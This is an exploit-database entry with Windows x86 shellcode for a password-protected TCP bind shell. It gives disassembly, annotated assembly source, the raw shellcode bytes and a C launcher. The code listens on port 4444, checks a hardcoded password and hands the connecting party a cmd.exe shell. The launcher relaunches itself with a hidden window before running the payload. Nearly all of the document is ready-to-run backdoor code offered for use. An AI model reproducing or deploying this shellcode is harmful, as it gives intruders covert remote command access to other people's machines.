###########################

# Windows x86 password protected bind shell tcp shellcode

###########################

/*
    # Title : Windows x86 password protected bind shell tcp shellcode
    # Date : 12-09-2016
    # Author : Roziul Hasan Khan Shifat
    # size : 637 bytes
    # Tested On : Windows 7 ultimate x86 x64
    # Email : shifath12@gmail.com
*/
 
/*
Disassembly of section .text:
 
00000000 <_start>:
   0:   99                      cltd   
   1:   64 8b 42 30             mov    %fs:0x30(%edx),%eax
   5:   8b 40 0c                mov    0xc(%eax),%eax
   8:   8b 70 14                mov    0x14(%eax),%esi
   b:   ad                      lods   %ds:(%esi),%eax
   c:   96                      xchg   %eax,%esi
   d:   ad                      lods   %ds:(%esi),%eax
   e:   8b 78 10                mov    0x10(%eax),%edi
  11:   8b 5f 3c                mov    0x3c(%edi),%ebx
  14:   01 fb                   add    %edi,%ebx
  16:   8b 5b 78                mov    0x78(%ebx),%ebx
  19:   01 fb                   add    %edi,%ebx
  1b:   8b 73 20                mov    0x20(%ebx),%esi
  1e:   01 fe                   add    %edi,%esi
 
00000020 <g>:
  20:   42                      inc    %edx
  21:   ad                      lods   %ds:(%esi),%eax
  22:   01 f8                   add    %edi,%eax
  24:   81 38 47 65 74 50       cmpl   $0x50746547,(%eax)
  2a:   75 f4                   jne    20 <g>
  2c:   81 78 04 72 6f 63 41    cmpl   $0x41636f72,0x4(%eax)
  33:   75 eb                   jne    20 <g>
  35:   81 78 08 64 64 72 65    cmpl   $0x65726464,0x8(%eax)
  3c:   75 e2                   jne    20 <g>
  3e:   8b 73 1c                mov    0x1c(%ebx),%esi
  41:   01 fe                   add    %edi,%esi
  43:   8b 0c 96                mov    (%esi,%edx,4),%ecx
  46:   01 f9                   add    %edi,%ecx
  48:   83 ec 50                sub    $0x50,%esp
  4b:   8d 34 24                lea    (%esp),%esi
  4e:   89 0e                   mov    %ecx,(%esi)
  50:   99                      cltd   
  51:   68 73 41 41 41          push   $0x41414173
  56:   88 54 24 02             mov    %dl,0x2(%esp)
  5a:   68 6f 63 65 73          push   $0x7365636f
  5f:   68 74 65 50 72          push   $0x72506574
  64:   68 43 72 65 61          push   $0x61657243
  69:   8d 14 24                lea    (%esp),%edx
  6c:   52                      push   %edx
  6d:   57                      push   %edi
  6e:   ff d1                   call   *%ecx
  70:   83 c4 10                add    $0x10,%esp
  73:   89 46 04                mov    %eax,0x4(%esi)
  76:   99                      cltd   
  77:   68 65 73 73 41          push   $0x41737365
  7c:   88 54 24 03             mov    %dl,0x3(%esp)
  80:   68 50 72 6f 63          push   $0x636f7250
  85:   68 45 78 69 74          push   $0x74697845
  8a:   8d 14 24                lea    (%esp),%edx
  8d:   52                      push   %edx
  8e:   57                      push   %edi
  8f:   ff 16                   call   *(%esi)
  91:   83 c4 0c                add    $0xc,%esp
  94:   89 46 08                mov    %eax,0x8(%esi)
  97:   99                      cltd   
  98:   52                      push   %edx
  99:   68 61 72 79 41          push   $0x41797261
  9e:   68 4c 69 62 72          push   $0x7262694c
  a3:   68 4c 6f 61 64          push   $0x64616f4c
  a8:   8d 14 24                lea    (%esp),%edx
  ab:   52                      push   %edx
  ac:   57                      push   %edi
  ad:   ff 16                   call   *(%esi)
  af:   83 c4 0c                add    $0xc,%esp
  b2:   99                      cltd   
  b3:   68 6c 6c 6c 6c          push   $0x6c6c6c6c
  b8:   88 54 24 02             mov    %dl,0x2(%esp)
  bc:   68 33 32 2e 64          push   $0x642e3233
  c1:   68 77 73 32 5f          push   $0x5f327377
  c6:   8d 14 24                lea    (%esp),%edx
  c9:   52                      push   %edx
  ca:   ff d0                   call   *%eax
  cc:   83 c4 0c                add    $0xc,%esp
  cf:   97                      xchg   %eax,%edi
  d0:   8b 5f 3c                mov    0x3c(%edi),%ebx
  d3:   01 fb                   add    %edi,%ebx
  d5:   8b 5b 78                mov    0x78(%ebx),%ebx
  d8:   01 fb                   add    %edi,%ebx
  da:   8b 5b 1c                mov    0x1c(%ebx),%ebx
  dd:   01 fb                   add    %edi,%ebx
  df:   99                      cltd   
  e0:   66 ba c8 01             mov    $0x1c8,%dx
  e4:   8b 04 13                mov    (%ebx,%edx,1),%eax
  e7:   01 f8                   add    %edi,%eax
  e9:   89 46 0c                mov    %eax,0xc(%esi)
  ec:   8b 43 50                mov    0x50(%ebx),%eax
  ef:   01 f8                   add    %edi,%eax
  f1:   89 46 10                mov    %eax,0x10(%esi)
  f4:   8b 43 04                mov    0x4(%ebx),%eax
  f7:   01 f8                   add    %edi,%eax
  f9:   89 46 14                mov    %eax,0x14(%esi)
  fc:   8b 03                   mov    (%ebx),%eax
  fe:   01 f8                   add    %edi,%eax
 100:   89 46 18                mov    %eax,0x18(%esi)
 103:   8b 43 30                mov    0x30(%ebx),%eax
 106:   01 f8                   add    %edi,%eax
 108:   89 46 1c                mov    %eax,0x1c(%esi)
 10b:   8b 43 08                mov    0x8(%ebx),%eax
 10e:   01 f8                   add    %edi,%eax
 110:   89 46 20                mov    %eax,0x20(%esi)
 113:   8b 43 3c                mov    0x3c(%ebx),%eax
 116:   01 f8                   add    %edi,%eax
 118:   89 46 24                mov    %eax,0x24(%esi)
 11b:   66 ba 88 01             mov    $0x188,%dx
 11f:   8b 04 13                mov    (%ebx,%edx,1),%eax
 122:   01 f8                   add    %edi,%eax
 124:   89 46 28                mov    %eax,0x28(%esi)
 127:   8b 43 48                mov    0x48(%ebx),%eax
 12a:   01 f8                   add    %edi,%eax
 12c:   89 46 2c                mov    %eax,0x2c(%esi)
 12f:   99                      cltd   
 130:   8d 4e 30                lea    0x30(%esi),%ecx
 133:   c6 01 02                movb   $0x2,(%ecx)
 136:   66 c7 41 02 11 5c       movw   $0x5c11,0x2(%ecx)
 13c:   89 51 04                mov    %edx,0x4(%ecx)
 13f:   89 51 08                mov    %edx,0x8(%ecx)
 142:   89 51 0c                mov    %edx,0xc(%ecx)
 145:   8d 4e 40                lea    0x40(%esi),%ecx
 148:   c7 01 45 6e 74 65       movl   $0x65746e45,(%ecx)
 14e:   c7 41 04 72 20 70 61    movl   $0x61702072,0x4(%ecx)
 155:   c7 41 08 73 73 20 63    movl   $0x63207373,0x8(%ecx)
 15c:   c7 41 0c 6f 64 65 3a    movl   $0x3a65646f,0xc(%ecx)
 163:   99                      cltd   
 164:   66 ba 90 01             mov    $0x190,%dx
 168:   29 d4                   sub    %edx,%esp
 16a:   8d 0c 24                lea    (%esp),%ecx
 16d:   83 c2 72                add    $0x72,%edx
 170:   51                      push   %ecx
 171:   52                      push   %edx
 172:   ff 56 0c                call   *0xc(%esi)
 175:   99                      cltd   
 176:   52                      push   %edx
 177:   52                      push   %edx
 178:   52                      push   %edx
 179:   b2 06                   mov    $0x6,%dl
 17b:   52                      push   %edx
 17c:   99                      cltd   
 17d:   42                      inc    %edx
 17e:   52                      push   %edx
 17f:   42                      inc    %edx
 180:   52                      push   %edx
 181:   ff 56 28                call   *0x28(%esi)
 184:   97                      xchg   %eax,%edi
 185:   99                      cltd   
 186:   42                      inc    %edx
 187:   52                      push   %edx
 188:   8d 0c 24                lea    (%esp),%ecx
 18b:   42                      inc    %edx
 18c:   52                      push   %edx
 18d:   51                      push   %ecx
 18e:   83 c2 02                add    $0x2,%edx
 191:   52                      push   %edx
 192:   99                      cltd   
 193:   66 ba ff ff             mov    $0xffff,%dx
 197:   52                      push   %edx
 198:   57                      push   %edi
 199:   ff 56 10                call   *0x10(%esi)
 19c:   99                      cltd   
 19d:   b2 10                   mov    $0x10,%dl
 19f:   52                      push   %edx
 1a0:   8d 4e 30                lea    0x30(%esi),%ecx
 1a3:   52                      push   %edx
 1a4:   51                      push   %ecx
 1a5:   57                      push   %edi
 1a6:   ff 56 14                call   *0x14(%esi)
 1a9:   99                      cltd   
 1aa:   42                      inc    %edx
 1ab:   52                      push   %edx
 1ac:   57                      push   %edi
 1ad:   ff 56 1c                call   *0x1c(%esi)
 1b0:   99                      cltd   
 1b1:   8d 5e 30                lea    0x30(%esi),%ebx
 1b4:   89 13                   mov    %edx,(%ebx)
 1b6:   89 53 04                mov    %edx,0x4(%ebx)
 1b9:   89 53 08                mov    %edx,0x8(%ebx)
 1bc:   89 53 0c                mov    %edx,0xc(%ebx)
 
000001bf <a>:
 1bf:   99                      cltd   
 1c0:   b2 10                   mov    $0x10,%dl
 1c2:   52                      push   %edx
 1c3:   8d 0c 24                lea    (%esp),%ecx
 1c6:   8d 5e 30                lea    0x30(%esi),%ebx
 1c9:   51                      push   %ecx
 1ca:   53                      push   %ebx
 1cb:   57                      push   %edi
 1cc:   ff 56 18                call   *0x18(%esi)
 1cf:   99                      cltd   
 1d0:   50                      push   %eax
 1d1:   52                      push   %edx
 1d2:   b2 10                   mov    $0x10,%dl
 1d4:   52                      push   %edx
 1d5:   8d 4e 40                lea    0x40(%esi),%ecx
 1d8:   51                      push   %ecx
 1d9:   50                      push   %eax
 1da:   ff 56 2c                call   *0x2c(%esi)
 1dd:   58                      pop    %eax
 1de:   89 c3                   mov    %eax,%ebx
 1e0:   99                      cltd   
 1e1:   52                      push   %edx
 1e2:   b2 10                   mov    $0x10,%dl
 1e4:   52                      push   %edx
 1e5:   8d 4e 40                lea    0x40(%esi),%ecx
 1e8:   51                      push   %ecx
 1e9:   50                      push   %eax
 1ea:   ff 56 24                call   *0x24(%esi)
 1ed:   8d 4e 40                lea    0x40(%esi),%ecx
 1f0:   81 39 64 61 6d 6e       cmpl   $0x6e6d6164,(%ecx)
 1f6:   75 5e                   jne    256 <kick_out>
 1f8:   81 79 04 5f 69 74 21    cmpl   $0x2174695f,0x4(%ecx)
 1ff:   75 55                   jne    256 <kick_out>
 201:   81 79 08 24 24 23 23    cmpl   $0x23232424,0x8(%ecx)
 208:   75 4c                   jne    256 <kick_out>
 20a:   81 79 0c 40 3b 2a 23    cmpl   $0x232a3b40,0xc(%ecx)
 211:   75 43                   jne    256 <kick_out>
 213:   89 df                   mov    %ebx,%edi
 215:   83 ec 10                sub    $0x10,%esp
 218:   8d 1c 24                lea    (%esp),%ebx
 21b:   99                      cltd   
 21c:   57                      push   %edi
 21d:   57                      push   %edi
 21e:   57                      push   %edi
 21f:   52                      push   %edx
 220:   52                      push   %edx
 221:   b2 ff                   mov    $0xff,%dl
 223:   42                      inc    %edx
 224:   52                      push   %edx
 225:   99                      cltd   
 226:   52                      push   %edx
 227:   52                      push   %edx
 228:   52                      push   %edx
 229:   52                      push   %edx
 22a:   52                      push   %edx
 22b:   52                      push   %edx
 22c:   52                      push   %edx
 22d:   52                      push   %edx
 22e:   52                      push   %edx
 22f:   52                      push   %edx
 230:   b2 44                   mov    $0x44,%dl
 232:   52                      push   %edx
 233:   8d 0c 24                lea    (%esp),%ecx
 236:   99                      cltd   
 237:   68 63 6d 64 41          push   $0x41646d63
 23c:   88 54 24 03             mov    %dl,0x3(%esp)
 240:   8d 04 24                lea    (%esp),%eax
 243:   53                      push   %ebx
 244:   51                      push   %ecx
 245:   52                      push   %edx
 246:   52                      push   %edx
 247:   52                      push   %edx
 248:   42                      inc    %edx
 249:   52                      push   %edx
 24a:   99                      cltd   
 24b:   52                      push   %edx
 24c:   52                      push   %edx
 24d:   50                      push   %eax
 24e:   52                      push   %edx
 24f:   ff 56 04                call   *0x4(%esi)
 252:   50                      push   %eax
 253:   ff 56 08                call   *0x8(%esi)
 
00000256 <kick_out>:
 256:   53                      push   %ebx
 257:   ff 56 20                call   *0x20(%esi)
 25a:   8d 4e 40                lea    0x40(%esi),%ecx
 25d:   c7 01 45 6e 74 65       movl   $0x65746e45,(%ecx)
 263:   c7 41 04 72 20 70 61    movl   $0x61702072,0x4(%ecx)
 26a:   c7 41 08 73 73 20 63    movl   $0x63207373,0x8(%ecx)
 271:   c7 41 0c 6f 64 65 3a    movl   $0x3a65646f,0xc(%ecx)
 278:   e9 42 ff ff ff          jmp    1bf <a>
*/
 
 
 /*
section .text
    global _start
_start:
 
cdq
mov eax,[fs:edx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB.Ldr
mov esi,[eax+0x14] ;PEB.Ldr->InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov edi,[eax+0x10] ;kernel32.dll base address
 
mov ebx,[edi+0x3c]
add ebx,edi
mov ebx,[ebx+0x78]
add ebx,edi
 
mov esi,[ebx+0x20]
add esi,edi
 
g:
inc edx
lodsd
add eax,edi
cmp dword [eax],'GetP'
jne g
cmp dword [eax+4],'rocA'
jne g
cmp dword [eax+8],'ddre'
jne g
 
mov esi,[ebx+0x1c]
add esi,edi
 
mov ecx,[esi+edx*4]
add ecx,edi
 
sub esp,80
lea esi,[esp]
 
mov [esi],dword ecx ;GetProcAddress() 0
 
;-----------------------
;address CreateProcessA()
 
cdq
push 0x41414173
mov [esp+2],byte dl
push 0x7365636f
push 0x72506574
push 0x61657243
 
lea edx,[esp]
 
push edx
push edi
 
call ecx
 
;----------------------
add esp,16
mov [esi+4],dword eax ;CreateProcessA() 4
;-------------------------------
;address ExitProcess()
cdq
push 0x41737365
mov [esp+3],byte dl
push 0x636f7250
push 0x74697845
 
lea edx,[esp]
 
push edx
push edi
 
call [esi]
 
;-------------------------------
add esp,12
mov [esi+8],dword eax ;ExitProcess() 8
;----------------------------------
cdq
push edx
push 0x41797261
push 0x7262694c
push 0x64616f4c
lea edx,[esp]
push edx
push edi
 
call [esi]
 
add esp,12
;------------------------
;loading ws2_32.dll
cdq
push 0x6c6c6c6c
mov [esp+2],byte dl
push 0x642e3233
push 0x5f327377
 
lea edx,[esp]
push edx
 
 
call eax
 
;---------------------------------
add esp,12
 
xchg edi,eax
 
 
mov ebx,[edi+0x3c]
add ebx,edi
mov ebx,[ebx+0x78]
add ebx,edi
 
mov ebx,[ebx+0x1c]
add ebx,edi
 
cdq
mov dx,456
 
mov eax,[ebx+edx]
add eax,edi
 
mov [esi+12],dword eax ;WSAStartup() 12
 
mov eax,[ebx+80]
add eax,edi
 
mov [esi+16],dword eax ;setsockopt() 16
 
mov eax,[ebx+4]
add eax,edi
 
mov [esi+20],dword eax ;bind() 20
 
mov eax,[ebx]
add eax,edi
 
mov [esi+24],dword eax ;accept() 24
 
mov eax,[ebx+48]
add eax,edi
 
mov [esi+28],dword eax ;listen() 28
 
mov eax,[ebx+8]
add eax,edi
 
mov [esi+32],dword eax ;closesocket() 32
 
mov eax,[ebx+60]
add eax,edi
 
mov [esi+36],dword eax ;recv() 36
 
mov dx,392
mov eax,[ebx+edx]
add eax,edi
 
mov [esi+40],dword eax ;WSASocketA() 40
 
 
 
mov eax,[ebx+72]
add eax,edi
 
mov [esi+44],dword eax ;send() 44
 
;---------------------------------
cdq
lea ecx,[esi+48]
mov [ecx],byte 2
mov [ecx+2],word 0x5c11
mov [ecx+4],edx
mov [ecx+8],edx
mov [ecx+12],edx
 
lea ecx,[esi+64]
mov [ecx],dword 'Ente'
mov [ecx+4],dword 'r pa'
mov [ecx+8],dword 'ss c'
mov [ecx+12],dword 'ode:'
 
;-----------------------------------
 
;WSAStartup(514,&WSADATA)
 
cdq
mov dx,400
sub esp,edx
lea ecx,[esp]
add edx,114
 
push ecx
push edx
 
call [esi+12]
 
;--------------------------------
;---------------------------
;;WSASocketA(2,1,6,0,0,0)
cdq
 
push edx
push edx
push edx
mov dl,6
push edx
cdq
inc edx
push edx
inc edx
push edx
 
call [esi+40]
 
xchg edi,eax ;SOCKET
;-------------------------------------
;setsockopt(SOCKET,0xffff,4,&1,2)
cdq
inc edx
push edx
lea ecx,[esp]
 
inc edx
push edx
push ecx
add edx,2
push edx
cdq
mov dx,0xffff
push edx
push edi
 
call [esi+16]
;----------------------
;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
 
cdq
mov dl,16
push edx
lea ecx,[esi+48]
 
push edx
push ecx
push edi
 
call [esi+20]
;----------------------------
;listen(SOCKET,1)
cdq
inc edx
push edx
push edi
 
call [esi+28]
 
 
cdq
lea ebx,[esi+48]
 
mov [ebx],edx
mov [ebx+4],edx
mov [ebx+8],edx
mov [ebx+12],edx
 
 
 
 
 
a:
;-----------------------------
;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,&16)
cdq
mov dl,16
push edx
lea ecx,[esp]
lea ebx,[esi+48]
 
push ecx
push ebx
push edi
 
call [esi+24]
;---------------------------------
;send(SOCKET,char *a[],16,0)
cdq
 
push eax
 
push edx
mov dl,16
push edx
lea ecx,[esi+64]
push ecx
push eax
 
call [esi+44]
;-----------------------
pop eax
 
;recv(SOCKET,char *a[],16,0)
mov ebx,eax
 
cdq
push edx
mov dl,16
push edx
lea ecx,[esi+64]
push ecx
push eax
 
call [esi+36]
;----------------------------------
 
lea ecx,[esi+64]
 
cmp dword [ecx],'damn'
jne kick_out
cmp dword [ecx+4],'_it!'
jne kick_out
cmp dword [ecx+8],'$$##'
jne kick_out
cmp dword [ecx+12],'@;*#'
jne kick_out
 
;password-> damn_it!$$##@;*# 
 
 
mov edi,ebx
sub esp,16
lea ebx,[esp]
 
cdq
push edi
push edi
push edi
 
push edx
push edx
 
mov dl,255
inc edx
push edx
cdq
 
push edx
push edx
push edx
push edx
push edx
 
push edx
push edx
push edx
push edx
push edx
 
mov dl,68
push edx
lea ecx,[esp]
 
cdq
 
push 'cmdA'
mov [esp+3],byte dl
lea eax,[esp]
 
;-------------------------------------------------
push ebx
push ecx
 
push edx
push edx
push edx
 
inc edx
push edx
cdq
 
push edx
push edx
 
push eax
push edx
 
call [esi+4]
push eax
call [esi+8]
 
 
 
kick_out:
push ebx
call [esi+32]
 
lea ecx,[esi+64]
mov [ecx],dword 'Ente'
mov [ecx+4],dword 'r pa'
mov [ecx+8],dword 'ss c'
mov [ecx+12],dword 'ode:'
 
jmp a
 */
 
 
 
#include<windows.h>
#include<stdio.h>
#include<shellapi.h>
#include<stdlib.h>
 
char shellcode[]="\x99\x64\x8b\x42\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x78\x10\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x73\x20\x01\xfe\x42\xad\x01\xf8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xfe\x8b\x0c\x96\x01\xf9\x83\xec\x50\x8d\x34\x24\x89\x0e\x99\x68\x73\x41\x41\x41\x88\x54\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x14\x24\x52\x57\xff\xd1\x83\xc4\x10\x89\x46\x04\x99\x68\x65\x73\x73\x41\x88\x54\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x14\x24\x52\x57\xff\x16\x83\xc4\x0c\x89\x46\x08\x99\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x14\x24\x52\x57\xff\x16\x83\xc4\x0c\x99\x68\x6c\x6c\x6c\x6c\x88\x54\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x14\x24\x52\xff\xd0\x83\xc4\x0c\x97\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x5b\x1c\x01\xfb\x99\x66\xba\xc8\x01\x8b\x04\x13\x01\xf8\x89\x46\x0c\x8b\x43\x50\x01\xf8\x89\x46\x10\x8b\x43\x04\x01\xf8\x89\x46\x14\x8b\x03\x01\xf8\x89\x46\x18\x8b\x43\x30\x01\xf8\x89\x46\x1c\x8b\x43\x08\x01\xf8\x89\x46\x20\x8b\x43\x3c\x01\xf8\x89\x46\x24\x66\xba\x88\x01\x8b\x04\x13\x01\xf8\x89\x46\x28\x8b\x43\x48\x01\xf8\x89\x46\x2c\x99\x8d\x4e\x30\xc6\x01\x02\x66\xc7\x41\x02\x11\x5c\x89\x51\x04\x89\x51\x08\x89\x51\x0c\x8d\x4e\x40\xc7\x01\x45\x6e\x74\x65\xc7\x41\x04\x72\x20\x70\x61\xc7\x41\x08\x73\x73\x20\x63\xc7\x41\x0c\x6f\x64\x65\x3a\x99\x66\xba\x90\x01\x29\xd4\x8d\x0c\x24\x83\xc2\x72\x51\x52\xff\x56\x0c\x99\x52\x52\x52\xb2\x06\x52\x99\x42\x52\x42\x52\xff\x56\x28\x97\x99\x42\x52\x8d\x0c\x24\x42\x52\x51\x83\xc2\x02\x52\x99\x66\xba\xff\xff\x52\x57\xff\x56\x10\x99\xb2\x10\x52\x8d\x4e\x30\x52\x51\x57\xff\x56\x14\x99\x42\x52\x57\xff\x56\x1c\x99\x8d\x5e\x30\x89\x13\x89\x53\x04\x89\x53\x08\x89\x53\x0c\x99\xb2\x10\x52\x8d\x0c\x24\x8d\x5e\x30\x51\x53\x57\xff\x56\x18\x99\x50\x52\xb2\x10\x52\x8d\x4e\x40\x51\x50\xff\x56\x2c\x58\x89\xc3\x99\x52\xb2\x10\x52\x8d\x4e\x40\x51\x50\xff\x56\x24\x8d\x4e\x40\x81\x39\x64\x61\x6d\x6e\x75\x5e\x81\x79\x04\x5f\x69\x74\x21\x75\x55\x81\x79\x08\x24\x24\x23\x23\x75\x4c\x81\x79\x0c\x40\x3b\x2a\x23\x75\x43\x89\xdf\x83\xec\x10\x8d\x1c\x24\x99\x57\x57\x57\x52\x52\xb2\xff\x42\x52\x99\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\xb2\x44\x52\x8d\x0c\x24\x99\x68\x63\x6d\x64\x41\x88\x54\x24\x03\x8d\x04\x24\x53\x51\x52\x52\x52\x42\x52\x99\x52\x52\x50\x52\xff\x56\x04\x50\xff\x56\x08\x53\xff\x56\x20\x8d\x4e\x40\xc7\x01\x45\x6e\x74\x65\xc7\x41\x04\x72\x20\x70\x61\xc7\x41\x08\x73\x73\x20\x63\xc7\x41\x0c\x6f\x64\x65\x3a\xe9\x42\xff\xff\xff";
 
int main(int i,char *a[])
{
 
    int mode;
 
 
 
    if(i==1)
    mode=1;
    else
    mode=atoi(a[1]);
 
switch(mode)
{
     
 
    case 78:
    (* (int(*)())shellcode )();
    break;
 
    case 1:
    ShellExecute(NULL,NULL,a[0],"78",NULL,0);
    default:
    break;
}
 
 
return 0;
}

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-10-15]

###########################